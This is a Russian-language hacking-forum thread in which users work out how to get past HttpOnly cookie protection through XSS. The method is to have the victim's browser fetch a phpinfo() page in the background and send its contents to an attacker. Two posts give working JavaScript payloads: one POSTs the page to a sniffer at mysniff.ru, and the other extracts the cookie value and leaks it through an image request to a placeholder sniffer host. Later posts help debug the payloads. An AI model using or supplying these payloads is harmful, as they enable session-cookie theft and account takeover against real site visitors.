ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.04.2016, 10:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
8469
Репутация:
1
|
|
Появилась идея обойти httponly кукис через страничку phpinfo. Чтобы пользователь зайдя на страничку с xss в фоновом режиме открывал phpinfo() а html код странички отправлялся нам . Может уже кто то реализовал такое ?
|
|
|
|
10.04.2016, 13:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
137056
Репутация:
11
|
|
Сообщение от bazaWT
bazaWT said:
↑
Появилась идея обойти httponly кукис через страничку phpinfo. Чтобы пользователь зайдя на страничку с xss в фоновом режиме открывал phpinfo() а html код странички отправлялся нам . Может уже кто то реализовал такое ? Вот пример, с помощью ajax открывается нужная страница и ее содержимое отсылается на целевой сниферок. Только для снифера нужно разрешить принимать запросы с других доменов (CORS):
Код:
Code:
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange= function() {
if (xhttp.readyState == 4 && xhttp.status == 200) {
var body = encodeURIComponent(xhttp.responseText);
xhttp.open("POST", 'http://mysniff.ru/t.php', true)
xhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
xhttp.send(body)
}
};
xhttp.open("GET", "phpinfo.php", true);
xhttp.withCredentials = true;
xhttp.send();
Я не знаю как себя будет на практике вести - в боевых условиях не тестил. Но может пригодится.
|
|
|
|
10.04.2016, 17:35
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
надеюсь @psihoz26 меня не покорает за его скрипт)
Код:
Code:
var xhr = new XMLHttpRequest();
xhr.open('GET', '//site/phpinfo.php', true);
xhr.send(null);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if(xhr.status == 200) {
(new Image()).src="//%сниффер%/?"+xhr.responseText.match(/_COOKIE.*?(.*?)/m)[1]
}
}
}
|
|
|
10.04.2016, 19:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
8469
Репутация:
1
|
|
Спасибо друзья +
|
|
|
|
11.04.2016, 09:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
8469
Репутация:
1
|
|
Сообщение от yarbabin
yarbabin said:
↑
надеюсь
@psihoz26
меня не покорает за его скрипт)
Код:
Code:
var xhr = new XMLHttpRequest();
xhr.open('GET', '//site/phpinfo.php', true);
xhr.send(null);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if(xhr.status == 200) {
(new Image()).src="//%сниффер%/?"+xhr.responseText.match(/_COOKIE.*?(.*?)/m)[1]
}
}
}
Не могу разобратся со скриптом, он должен исполнятся прямо в XSS или можно подгружать с другого домена ? Пробовал подгружать, но на сниф ничего не приходит, Firebug показывает что скрипт подгружается, но следующего этапа - загрузки phpinfo() не показывает . Кроме того в сниф надо что то дописывать? он у меня простенький
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
|
|
|
|
11.04.2016, 10:32
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от bazaWT
bazaWT said:
↑
Пробовал подгружать, но на сниф ничего не приходит, Firebug показывает что скрипт подгружается, но следующего этапа - загрузки phpinfo() не показывает В любом браузере есть инструменты разработчика, где можно посмотреть ошибки выполнения JS.
|
|
|
|
11.04.2016, 12:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
8469
Репутация:
1
|
|
Сообщение от M_script
M_script said:
↑
В любом браузере есть инструменты разработчика, где можно посмотреть ошибки выполнения JS. Ошибки JS нет , он подгружается из другого домена ( ответ 200) , но в инструментах разработчика нигде не написано что браузер обращается к site.com/info.php
|
|
|
|
11.04.2016, 12:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от bazaWT
bazaWT said:
↑
Ошибки JS нет , он подгружается из другого домена ( ответ 200) , но в инструментах разработчика нигде не написано что браузер обращается к site.com/info.php такое может происходить если куки не распарсились, посмотри вывод phpinfo, там точно есть массив HTTP_COOKIE ?
|
|
|
|
11.04.2016, 12:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
137056
Репутация:
11
|
|
Сообщение от bazaWT
bazaWT said:
↑
Ошибки JS нет , он подгружается из другого домена ( ответ 200) , но в инструментах разработчика нигде не написано что браузер обращается к site.com/info.php Поставь fiddler и посмотри что куда шлется (и шлется ли вообще?). И на своем принимаемом скрипте нужно еще указать:
|
|
|
|
11.04.2016, 14:45
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от bazaWT
bazaWT said:
↑
Ошибки JS нет Добавь в начале кода строку "window.onload = function() {", в конце "}". Также укажи протокол в ссылках "http://" или "https://" вместо "//", не все браузеры поддерживают.
Сообщение от blackbox
blackbox said:
↑
И на своем принимаемом скрипте нужно еще указать: Кроссдоменные запросы отправляться будут, получить ответ нельзя, но это и не нужно в данном случае.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
